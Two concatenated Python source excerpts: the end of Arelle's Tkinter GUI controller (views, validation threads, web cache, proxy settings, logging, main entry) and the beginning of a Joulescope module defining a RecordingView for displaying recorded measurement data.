currentAction = "tree view of DTS"
ViewWinDTS.viewDTS(modelXbrl, self.tabWinTopLeft, altTabWin=self.tabWinTopRt)
currentAction = "view of concepts"
ViewWinConcepts.viewConcepts(modelXbrl, self.tabWinBtm, "Concepts", lang=self.labelLang, altTabWin=self.tabWinTopRt)
if modelXbrl.hasTableRendering: # show rendering grid even without any facts
ViewWinRenderedGrid.viewRenderedGrid(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
if modelXbrl.modelDocument.type in (ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL, ModelDocument.Type.INLINEXBRLDOCUMENTSET):
currentAction = "table view of facts"
if (not modelXbrl.hasTableRendering and # table view only if not grid rendered view
modelXbrl.relationshipSet(XbrlConst.parentChild)): # requires presentation relationships to render this tab
ViewWinFactTable.viewFacts(modelXbrl, self.tabWinTopRt, linkrole=firstTableLinkroleURI, lang=self.labelLang, expandAll=firstTableLinkroleURI is not None)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "tree/list of facts"
ViewWinFactList.viewFacts(modelXbrl, self.tabWinTopRt, lang=self.labelLang)
if topView is None: topView = modelXbrl.views[-1]
currentAction = "presentation linkbase view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.parentChild, lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "calculation linkbase view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, XbrlConst.summationItem, lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "dimensions relationships view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "XBRL-dimensions", lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasTableRendering:
currentAction = "rendering view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, "Table-rendering", lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
if modelXbrl.hasFormulae:
currentAction = "formulae view"
ViewWinFormulae.viewFormulae(modelXbrl, self.tabWinTopRt)
if topView is None: topView = modelXbrl.views[-1]
for name, arcroles in sorted(self.config.get("arcroleGroups", {}).items()):
if XbrlConst.arcroleGroupDetect in arcroles:
currentAction = name + " view"
hasView = ViewWinRelationshipSet.viewRelationshipSet(modelXbrl, self.tabWinTopRt, (name, arcroles), lang=self.labelLang)
if hasView and topView is None: topView = modelXbrl.views[-1]
currentAction = "property grid"
ViewWinProperties.viewProperties(modelXbrl, self.tabWinTopLeft)
currentAction = "log view creation time"
viewTime = time.time() - startedAt
modelXbrl.profileStat("view", viewTime)
self.addToLog(format_string(self.modelManager.locale,
_("views %.2f secs"), viewTime))
if selectTopView and topView:
topView.select()
self.currentView = topView
currentAction = "plugin method CntlrWinMain.Xbrl.Loaded"
for xbrlLoadedMethod in pluginClassMethods("CntlrWinMain.Xbrl.Loaded"):
xbrlLoadedMethod(self, modelXbrl, attach) # runs in GUI thread
except Exception as err:
msg = _("Exception preparing {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
            self.addToLog(msg)
self.showStatus(_("Ready..."), 2000)
def showFormulaOutputInstance(self, priorOutputInstance, currentOutputInstance):
currentAction = "closing prior formula output instance"
try:
if priorOutputInstance: # if has UI must close on UI thread, not background thread
priorOutputInstance.close()
currentAction = "showing resulting formula output instance"
if currentOutputInstance:
ViewWinXml.viewXml(currentOutputInstance, self.tabWinBtm, "Formula Output Instance", currentOutputInstance.modelDocument.xmlDocument)
except Exception as err:
msg = _("Exception {0}: {1}, at {2}").format(
currentAction,
err,
traceback.format_tb(sys.exc_info()[2]))
tkinter.messagebox.showwarning(_("Exception preparing view"),msg, parent=self.parent)
            self.addToLog(msg)
self.showStatus(_("Ready..."), 2000)
def showProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.logProfileStats()
def clearProfileStats(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl and self.modelManager.collectProfileStats:
modelXbrl.profileStats.clear()
def fileClose(self, *ignore):
if not self.okayToContinue():
return
self.modelManager.close()
self.parent.title(_("arelle - Unnamed"))
self.setValidateTooltipText()
self.currentView = None
def fileReopen(self, *ignore):
self.fileClose()
fileHistory = self.config.setdefault("fileHistory", [])
if len(fileHistory) > 0:
self.fileOpenFile(fileHistory[0])
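    # start validation of the current DTS or testcases on a background thread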
def validate(self):
modelXbrl = self.modelManager.modelXbrl
if modelXbrl:
if (modelXbrl.modelManager.validateDisclosureSystem and
not modelXbrl.modelManager.disclosureSystem.selection):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Validation - disclosure system checks is requested but no disclosure system is selected, please select one by validation - select disclosure system."),
parent=self.parent)
else:
if modelXbrl.modelDocument.type in ModelDocument.Type.TESTCASETYPES:
for pluginXbrlMethod in pluginClassMethods("Testcases.Start"):
pluginXbrlMethod(self, None, modelXbrl)
                threading.Thread(target=self.backgroundValidate, daemon=True).start()
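    # background thread: run validation, then queue formula output display and log selection on the UI thread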
def backgroundValidate(self):
startedAt = time.time()
modelXbrl = self.modelManager.modelXbrl
priorOutputInstance = modelXbrl.formulaOutputInstance
modelXbrl.formulaOutputInstance = None # prevent closing on background thread by validateFormula
self.modelManager.validate()
self.addToLog(format_string(self.modelManager.locale,
_("validated in %.2f secs"),
time.time() - startedAt))
if not modelXbrl.isClosed and (priorOutputInstance or modelXbrl.formulaOutputInstance):
self.uiThreadQueue.put((self.showFormulaOutputInstance, [priorOutputInstance, modelXbrl.formulaOutputInstance]))
self.uiThreadQueue.put((self.logSelect, []))
def compareDTSes(self):
countLoadedDTSes = len(self.modelManager.loadedModelXbrls)
if countLoadedDTSes != 2:
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Two DTSes are required for the Compare DTSes operation, {0} found").format(countLoadedDTSes),
parent=self.parent)
return False
versReportFile = self.uiFileDialog("save",
title=_("arelle - Save Versioning Report File"),
initialdir=self.config.setdefault("versioningReportDir","."),
filetypes=[(_("Versioning report file"), "*.xml")],
defaultextension=".xml")
if not versReportFile:
return False
self.config["versioningReportDir"] = os.path.dirname(versReportFile)
self.saveConfig()
        threading.Thread(target=self.backgroundCompareDTSes, args=(versReportFile,), daemon=True).start()
def backgroundCompareDTSes(self, versReportFile):
startedAt = time.time()
modelVersReport = self.modelManager.compareDTSes(versReportFile)
if modelVersReport and modelVersReport.modelDocument:
self.addToLog(format_string(self.modelManager.locale,
_("compared in %.2f secs"),
time.time() - startedAt))
self.uiThreadQueue.put((self.showComparedDTSes, [modelVersReport]))
def showComparedDTSes(self, modelVersReport):
# close prior DTS displays
modelVersReport.modelDocument.fromDTS.closeViews()
modelVersReport.modelDocument.toDTS.closeViews()
self.showLoadedXbrl(modelVersReport, True)
def loadFile(self, filename):
self.filename = filename
self.listBox.delete(0, END)
self.dirty = False
try:
with open(self.filename, "rb") as fh:
self.data = pickle.load(fh)
for name in sorted(self.data, key=str.lower):
self.listBox.insert(END, name)
self.showStatus(_("Loaded {0} items from {1}").format(
                self.listBox.size(),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to load {0}\n{1}").format(
self.filename,
err),
parent=self.parent)
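    # persist window geometry and pane sizes, save the configuration, and shut down (optionally restarting)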
def quit(self, event=None, restartAfterQuit=False):
if self.okayToContinue():
self.modelManager.close()
logging.shutdown()
global restartMain
restartMain = restartAfterQuit
state = self.parent.state()
if state == "normal":
self.config["windowGeometry"] = self.parent.geometry()
if state in ("normal", "zoomed"):
self.config["windowState"] = state
if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
elif self.isMac: adjustW = 54; adjustH = 39
else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
self.tabWinTopLeft.winfo_height() - adjustH)
super(CntlrWinMain, self).close(saveConfig=True)
self.parent.unbind_all(())
self.parent.destroy()
if self.logFile:
self.logFile.close()
self.logFile = None
def restart(self, event=None):
self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
self.webCache.workOffline = self.workOffline.get()
self.config["workOffline"] = self.webCache.workOffline
self.saveConfig()
def setNoCertificateCheck(self, *args):
self.webCache.noCertificateCheck = self.noCertificateCheck.get() # resets proxy handlers
self.config["noCertificateCheck"] = self.webCache.noCertificateCheck
self.saveConfig()
def confirmClearWebCache(self):
if tkinter.messagebox.askyesno(
_("arelle - Clear Internet Cache"),
_("Are you sure you want to clear the internet cache?"),
parent=self.parent):
def backgroundClearCache():
self.showStatus(_("Clearing internet cache"))
self.webCache.clear()
self.showStatus(_("Internet cache cleared"), 5000)
            threading.Thread(target=backgroundClearCache, daemon=True).start()
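    # open the web cache directory in the platform's file manager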
def manageWebCache(self):
if sys.platform.startswith("win"):
command = 'explorer'
elif sys.platform in ("darwin", "macos"):
command = 'open'
else: # linux/unix
command = 'xdg-open'
try:
subprocess.Popen([command,self.webCache.cacheDir])
except:
pass
def setupProxy(self):
from arelle.DialogUserPassword import askProxy
proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
if proxySettings:
self.webCache.resetProxies(proxySettings)
self.config["proxySettings"] = proxySettings
self.saveConfig()
def setValidateDisclosureSystem(self, *args):
self.modelManager.validateDisclosureSystem = self.validateDisclosureSystem.get()
self.config["validateDisclosureSystem"] = self.modelManager.validateDisclosureSystem
self.saveConfig()
if self.modelManager.validateDisclosureSystem:
if not self.modelManager.disclosureSystem or not self.modelManager.disclosureSystem.selection:
self.selectDisclosureSystem()
self.setValidateTooltipText()
def selectDisclosureSystem(self, *args):
from arelle import DialogOpenArchive
self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
self.saveConfig()
self.setValidateTooltipText()
def formulaParametersDialog(self, *args):
DialogFormulaParameters.getParameters(self)
self.setValidateTooltipText()
def rssWatchOptionsDialog(self, *args):
from arelle import DialogRssWatch
DialogRssWatch.getOptions(self)
# find or open rssWatch view
def rssWatchControl(self, start=False, stop=False, close=False):
from arelle.ModelDocument import Type
from arelle import WatchRss
if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
_("RSS Feed is not set up, please select options and select feed"),
parent=self.parent)
return False
rssModelXbrl = None
for loadedModelXbrl in self.modelManager.loadedModelXbrls:
if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
rssModelXbrl = loadedModelXbrl
break
#not loaded
if start:
if not rssModelXbrl:
rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
self.showLoadedXbrl(rssModelXbrl, False)
if not hasattr(rssModelXbrl,"watchRss"):
WatchRss.initializeWatcher(rssModelXbrl)
rssModelXbrl.watchRss.start()
elif stop:
if rssModelXbrl and rssModelXbrl.watchRss:
rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
self.uiThreadQueue.put((self.uiRssWatchUpdateOption, [latestPubDate]))
# ui thread addToLog
def uiRssWatchUpdateOption(self, latestPubDate):
if latestPubDate:
self.modelManager.rssWatchOptions["latestPubDate"] = latestPubDate
self.config["rssWatchOptions"] = self.modelManager.rssWatchOptions
self.saveConfig()
def languagesDialog(self, *args):
override = self.lang if self.lang != self.modelManager.defaultLang else ""
import tkinter.simpledialog
newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
_("The system default language is: {0} \n\n"
"You may override with a different language for labels display. \n\n"
"Current language override code: {1} \n"
"(Leave empty to use the system default language.)").format(
self.modelManager.defaultLang, override),
parent=self.parent)
if newValue is not None:
self.config["labelLangOverride"] = newValue
if newValue:
self.lang = newValue
else:
self.lang = self.modelManager.defaultLang
if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
self.saveConfig()
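    # compose the validate toolbar button's tooltip from the current validation option settings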
def setValidateTooltipText(self):
if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
valType = self.modelManager.modelXbrl.modelDocument.type
if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
valName = "DTS"
else:
valName = ModelDocument.Type.typeName[valType]
if valType == ModelDocument.Type.VERSIONINGREPORT:
v = _("Validate versioning report")
else:
if self.modelManager.validateCalcLB:
if self.modelManager.validateInferDecimals:
c = _("\nCheck calculations (infer decimals)")
else:
c = _("\nCheck calculations (infer precision)")
if self.modelManager.validateDedupCalcs:
c += _("\nDeduplicate calculations")
else:
c = ""
if self.modelManager.validateUtr:
u = _("\nCheck unit type registry")
else:
u = ""
if self.modelManager.validateDisclosureSystem:
v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
valName, self.modelManager.disclosureSystem.selection,c,u)
else:
v = _("Validate {0}{1}{2}").format(valName, c, u)
else:
v = _("Validate")
self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
self.modelManager.validateCalcLB = self.validateCalcLB.get()
self.config["validateCalcLB"] = self.modelManager.validateCalcLB
self.saveConfig()
self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
self.modelManager.validateInferDecimals = self.validateInferDecimals.get()
self.config["validateInferDecimals"] = self.modelManager.validateInferDecimals
self.saveConfig()
self.setValidateTooltipText()
def setValidateDedupCalcs(self, *args):
self.modelManager.validateDedupCalcs = self.validateDedupCalcs.get()
self.config["validateDedupCalcs"] = self.modelManager.validateDedupCalcs
self.saveConfig()
self.setValidateTooltipText()
def setValidateUtr(self, *args):
self.modelManager.validateUtr = self.validateUtr.get()
self.config["validateUtr"] = self.modelManager.validateUtr
self.saveConfig()
self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
self.modelManager.collectProfileStats = self.collectProfileStats.get()
self.config["collectProfileStats"] = self.modelManager.collectProfileStats
self.saveConfig()
def setShowDebugMessages(self, *args):
self.config["showDebugMessages"] = self.showDebugMessages.get()
self.saveConfig()
def find(self, *args):
from arelle.DialogFind import find
find(self)
def helpAbout(self, event=None):
from arelle import DialogAbout, Version
from lxml import etree
DialogAbout.about(self.parent,
_("About arelle"),
os.path.join(self.imagesDir, "arelle32.gif"),
_("arelle\u00ae {0} ({1}bit)\n"
"An open source XBRL platform\n"
"\u00a9 2010-{2} Mark V Systems Limited\n"
"All rights reserved\nhttp://www.arelle.org\nsupport@arelle.org\n\n"
"Licensed under the Apache License, Version 2.0 (the \"License\"); "
"you may not use this file except in compliance with the License. "
"You may obtain a copy of the License at\n\n"
"http://www.apache.org/licenses/LICENSE-2.0\n\n"
"Unless required by applicable law or agreed to in writing, software "
"distributed under the License is distributed on an \"AS IS\" BASIS, "
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
"See the License for the specific language governing permissions and "
"limitations under the License."
"\n\nIncludes:"
"\n Python\u00ae {4[0]}.{4[1]}.{4[2]} \u00a9 2001-2016 Python Software Foundation"
"\n Tcl/Tk {6} \u00a9 Univ. of Calif., Sun, Scriptics, ActiveState, and others"
"\n PyParsing \u00a9 2003-2013 Paul T. McGuire"
"\n lxml {5[0]}.{5[1]}.{5[2]} \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
"{3}"
"\n May include installable plug-in modules with author-specific license terms"
)
.format(Version.__version__, self.systemWordSize, Version.copyrightLatestYear,
_("\n Bottle \u00a9 2011-2013 Marcel Hellkamp"
"\n CherryPy \u00a9 2002-2013 CherryPy Team") if self.hasWebServer else "",
sys.version_info, etree.LXML_VERSION, Tcl().eval('info patchlevel')
))
# worker threads addToLog
    def addToLog(self, message, messageCode="", messageArgs=None, file="", refs=None, level=logging.INFO):
if level == logging.DEBUG and not self.showDebugMessages.get():
return
if messageCode and messageCode not in message: # prepend message code
message = "[{}] {}".format(messageCode, message)
if refs:
message += " - " + Cntlr.logRefsFileLines(refs)
elif file:
if isinstance(file, (tuple,list,set)):
message += " - " + ", ".join(file)
elif isinstance(file, _STR_BASE):
message += " - " + file
if isinstance(messageArgs, dict):
try:
message = message % messageArgs
except (KeyError, TypeError, ValueError) as ex:
message += " \nMessage log error: " + str(ex)
self.uiThreadQueue.put((self.uiAddToLog, [message]))
# ui thread addToLog
def uiAddToLog(self, message):
try:
self.logView.append(message)
except:
pass
def logClear(self, *ignore):
self.logView.clear()
def logSelect(self, *ignore):
self.logView.select()
def logSaveToFile(self, *ignore):
filename = self.uiFileDialog("save",
title=_("arelle - Save Messages Log"),
initialdir=".",
filetypes=[(_("Txt file"), "*.txt")],
defaultextension=".txt")
if not filename:
return False
try:
self.logView.saveToFile(filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
        return True
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
self.waitForUiThreadQueue() # force prior ui view updates if any
self.uiThreadQueue.put((self.uiViewModelObject, [modelXbrl, objectId]))
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
modelXbrl.viewModelObject(objectId)
# worker threads viewModelObject
def reloadViews(self, modelXbrl):
self.uiThreadQueue.put((self.uiReloadViews, [modelXbrl]))
# ui thread viewModelObject
def uiReloadViews(self, modelXbrl):
for view in modelXbrl.views:
view.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
self.uiThreadQueue.put((self.uiShowStatus, [message, clearAfter]))
# ui thread showStatus
def uiClearStatusTimerEvent(self):
if self.statusbarTimerId: # if timer still wanted, clear status
self.statusbar["text"] = ""
self.statusbarTimerId = None
def uiShowStatus(self, message, clearAfter=None):
if self.statusbarTimerId: # ignore timer
self.statusbarTimerId = None
self.statusbar["text"] = message
if clearAfter is not None and clearAfter > 0:
self.statusbarTimerId = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
from arelle.DialogUserPassword import askUserPassword
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
untilDone.wait()
return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
from arelle.DialogUserPassword import askInternetLogon
untilDone = threading.Event()
result = []
self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
untilDone.wait()
return result[0]
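    # worker threads: block briefly (up to 2 secs) until queued UI updates have been processed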
def waitForUiThreadQueue(self):
for i in range(40): # max 2 secs
if self.uiThreadQueue.empty():
break
time.sleep(0.05)
def uiThreadChecker(self, widget, delayMsecs=100): # 10x per second
# process callback on main (UI) thread
while not self.uiThreadQueue.empty():
try:
(callback, args) = self.uiThreadQueue.get(block=False)
except queue.Empty:
pass
else:
callback(*args)
widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
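    # platform-appropriate open/save dialog; uses native win32gui dialogs when available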
def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None):
if parent is None: parent = self.parent
if multiple and action == "open": # return as simple list of file names
multFileNames = tkinter.filedialog.askopenfilename(
multiple=True,
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
if isinstance(multFileNames, (tuple,list)):
return multFileNames
return re.findall("[{]([^}]+)[}]", # older multiple returns "{file1} {file2}..."
multFileNames)
elif self.hasWin32gui:
import win32gui
try:
filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
"save":win32gui.GetSaveFileNameW}[action](
hwndOwner=(owner if owner else parent).winfo_id(),
hInstance=win32gui.GetModuleHandle(None),
Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
MaxFile=4096,
InitialDir=initialdir,
Title=title,
DefExt=defaultextension)
return filename
except win32gui.error:
return ''
else:
return {"open":tkinter.filedialog.askopenfilename,
"save":tkinter.filedialog.asksaveasfilename}[action](
title=title,
initialdir=initialdir,
filetypes=[] if self.isMac else filetypes,
defaultextension=defaultextension,
parent=parent)
from arelle import DialogFormulaParameters
class WinMainLogHandler(logging.Handler):
def __init__(self, cntlr):
super(WinMainLogHandler, self).__init__()
self.cntlr = cntlr
#formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
self.setFormatter(formatter)
self.logRecordBuffer = None
def startLogBuffering(self):
if self.logRecordBuffer is None:
self.logRecordBuffer = []
def endLogBuffering(self):
self.logRecordBuffer = None
def flush(self):
''' Nothing to flush '''
def emit(self, logRecord):
if self.logRecordBuffer is not None:
self.logRecordBuffer.append(logRecord)
# add to logView
msg = self.format(logRecord)
try:
self.cntlr.addToLog(msg, level=logRecord.levelno)
except:
pass
class TkinterCallWrapper:
"""Replacement for internal tkinter class. Stores function to call when some user
defined Tcl function is called e.g. after an event occurred."""
def __init__(self, func, subst, widget):
"""Store FUNC, SUBST and WIDGET as members."""
self.func = func
self.subst = subst
self.widget = widget
def __call__(self, *args):
"""Apply first function SUBST to arguments, than FUNC."""
try:
if self.subst:
args = self.subst(*args)
return self.func(*args)
except SystemExit as msg:
raise SystemExit(msg)
except Exception:
# this was tkinter's standard coding: self.widget._report_exception()
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=30))
tkinter.messagebox.showerror(_("Exception"),
_("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
# this is the entry called by arelleGUI.pyw for windows
if sys.platform == "darwin":
_resourcesDir = Cntlr.resourcesDir()
for _tcltk in ("tcl", "tk"):
for _tcltkVer in ("8.5", "8.6"):
_tcltkDir = os.path.join(_resourcesDir, _tcltk + _tcltkVer)
if os.path.exists(_tcltkDir):
os.environ[_tcltk.upper() + "_LIBRARY"] = _tcltkDir
elif sys.platform == 'win32':
if getattr(sys, 'frozen', False): # windows requires fake stdout/stderr because no write/flush (e.g., EdgarRenderer LocalViewer pybottle)
class dummyFrozenStream:
def __init__(self): pass
def write(self,data): pass
def read(self,data): pass
def flush(self): pass
def close(self): pass
sys.stdout = dummyFrozenStream()
sys.stderr = dummyFrozenStream()
sys.stdin = dummyFrozenStream()
global restartMain
while restartMain:
restartMain = False
try:
application = Tk()
cntlrWinMain = CntlrWinMain(application)
application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
if sys.platform == "darwin" and not __file__.endswith(".app/Contents/MacOS/arelleGUI"):
# not built app - launches behind python or eclipse
application.lift()
application.call('wm', 'attributes', '.', '-topmost', True)
cntlrWinMain.uiThreadQueue.put((application.call, ['wm', 'attributes', '.', '-topmost', False]))
os.system('''/usr/bin/osascript -e 'tell app "Finder" to set frontmost of process "Python" to true' ''')
application.mainloop()
except Exception: # unable to start Tk or other fatal error
exc_type, exc_value, exc_traceback = sys.exc_info()
msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
tracebk = ''.join(traceback.format_tb(exc_traceback, limit=7))
logMsg = "{}\nCall Trace\n{}\nEnvironment {}".format(msg, tracebk, os.environ)
print(logMsg, file=sys.stderr)
if syslog is not None:
syslog.openlog("Arelle")
syslog.syslog(syslog.LOG_ALERT, logMsg)
try: # this may crash. Note syslog has 1k message length
logMsg = "tcl_pkgPath {} tcl_library {} tcl version {}".format(
Tcl().getvar("tcl_pkgPath"), Tcl().getvar("tcl_library"), Tcl().eval('info patchlevel'))
if syslog is not None:
syslog.syslog(syslog.LOG_ALERT, logMsg)
print(logMsg, file=sys.stderr)
except:
pass
if syslog is not None:
syslog.closelog()
if __name__ == "__main__":
# this is the entry called by MacOS open and MacOS shell scripts
# check if ARELLE_ARGS are used to emulate command line operation
if os.getenv("ARELLE_ARGS"):
# command line mode
from arelle import CntlrCmdLine
CntlrCmdLine.main()
else:
# GUI mode
main()
|
recording_viewer_device.py
|
# Copyright 2018 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from joulescope.data_recorder import DataReader
from joulescope.view import data_array_to_update
from joulescope_ui.data_view_api import DataViewApi
from joulescope import span
import os
import numpy as np
import threading
import queue
import weakref
import logging
TIMEOUT = 10.0
class RecordingView:
"""A user-interface-compatible device that displays previous recorded data"""
def __init__(self, parent):
self._parent = weakref.ref(parent)
self._x_range = [0.0, 1.0]
self._span = None
self._x = None
self._samples_per = 1
self._refresh_requested = False
self._cache = None
self.on_update_fn = None # callable(data)
self._log = logging.getLogger(__name__)
def __str__(self):
        return 'RecordingView()'
def __len__(self):
if self._span is None:
return 0
return self._span.length
@property
def sampling_frequency(self):
return self._parent().sampling_frequency
@property
def calibration(self):
return self._parent().calibration
@property
def limits(self):
"""Get the (x_min, x_max) limits for the view."""
if self._span is not None:
return list(self._span.limits)
return None
@property
def _reader(self):
return self._parent()._reader
@property
def voltage_range(self):
return self._reader.voltage_range
def _on_x_change(self, cmd, kwargs):
x_range = self._x_range
if cmd == 'resize': # {pixels: int}
length = kwargs['pixels']
if length is not None and length != self._span.length:
self._log.info('resize %s', length)
self._span.length = length
self._cache = None # invalidate
x_range, self._samples_per, self._x = self._span.conform_discrete(x_range)
elif cmd == 'span_absolute': # {range: (start: float, stop: float)}]
x_range, self._samples_per, self._x = self._span.conform_discrete(kwargs.get('range'))
elif cmd == 'span_relative': # {pivot: float, gain: float}]
x_range, self._samples_per, self._x = self._span.conform_discrete(
x_range, gain=kwargs.get('gain'), pivot=kwargs.get('pivot'))
elif cmd == 'span_pan':
delta = kwargs.get('delta', 0.0)
x_range = [x_range[0] + delta, x_range[-1] + delta]
x_range, self._samples_per, self._x = self._span.conform_discrete(x_range)
elif cmd == 'refresh':
self._cache = None # invalidate
self._refresh_requested = True
return
else:
self._log.warning('on_x_change(%s) unsupported', cmd)
return
if self._x_range != x_range:
self._cache = None # invalidate
self._x_range = x_range
self._refresh_requested = True
self._log.info('cmd=%s, changed=%s, length=%s, span=%s, range=%s, samples_per=%s',
cmd, self._cache is None, len(self), self._x_range,
self._x_range[1] - self._x_range[0], self._samples_per)
def _update(self):
if not callable(self.on_update_fn) or self._reader is None:
return
self._refresh_requested = False
if self._cache is not None:
self.on_update_fn(self._cache)
return
f = self._reader.sampling_frequency
self._log.info('update: x_range=%r', self._x_range)
start, stop = [int(x * f) for x in self._x_range]
self._log.info('update: x_range=%r => (%s, %s)', self._x_range, start, stop)
data = self._reader.data_get(start, stop, self._samples_per)
t_start = start / self._reader.sampling_frequency
t_stop = stop / self._reader.sampling_frequency
x = np.linspace(t_start, t_stop, len(data), dtype=np.float64)
if not len(x):
self._log.info('update: empty')
else:
self._log.info('update: len=%d, x_range=>(%s, %s)', len(data), x[0], x[-1])
self._cache = data_array_to_update(self.limits, x, data)
self.on_update_fn(self._cache)
def time_to_sample_id(self, t):
if self._reader is None:
return None
return self._reader.time_to_sample_id(t)
def sample_id_to_time(self, t):
if self._reader is None:
return None
return self._reader.sample_id_to_time(t)
def _statistics_get(self, start=None, stop=None, units=None):
"""Get the statistics for the collected sample data over a time range.
:param start: The starting time relative to the streaming start time.
:param stop: The ending time.
:param units: The units for start and stop.
'seconds' or None is in floating point seconds relative to the view.
'samples' is in stream buffer sample indices.
:return: The statistics data structure.
"""
if self._reader is None:
return None
return self._reader.statistics_get(start=start, stop=stop, units=units)
def _statistics_get_multiple(self, ranges, units=None):
return [self._statistics_get(x[0], x[1], units=units) for x in ranges]
def _samples_get(self, start=None, stop=None, units=None, fields=None):
r = self._reader
if r is None:
return None
return r.samples_get(start, stop, units, fields)
def open(self):
f = self._reader.sampling_frequency
if f <= 0:
self._log.warning('Invalid sampling_frequency %r, assume 1 Hz', f)
f = 1.0
r = self._reader.sample_id_range
x_lim = [x / f for x in r]
self._span = span.Span(x_lim, 1 / f, 100)
self._x_range, self._samples_per, self._x = self._span.conform_discrete(x_lim)
self._cache = None # invalidate
def close(self):
if self._parent()._thread is not None:
return self._parent()._post_block('view_close', None, self)
def refresh(self, force=None):
return self._parent()._post('refresh', self, {'force': force})
def on_x_change(self, cmd, kwargs):
self._parent()._post('on_x_change', self, (cmd, kwargs))
def samples_get(self, start=None, stop=None, units=None, fields=None):
"""Get exact samples over a range.
:param start: The starting time.
:param stop: The ending time.
:param units: The units for start and stop.
'seconds' or None is in floating point seconds relative to the view.
            'samples' is in stream buffer sample indices.
:param fields: The list of field names to get.
"""
args = {'start': start, 'stop': stop, 'units': units, 'fields': fields}
return self._parent()._post_block('samples_get', self, args)
def statistics_get(self, start=None, stop=None, units=None, callback=None):
"""Get statistics over a range.
:param start: The starting time.
:param stop: The ending time.
:param units: The units for start and stop.
'seconds' or None is in floating point seconds relative to the view.
            'samples' is in stream buffer sample indices.
:param callback: The optional callable. When provided, this method will
not block and the callable will be called with the statistics
data structure from the view thread.
:return: The statistics data structure or None if callback is provided.
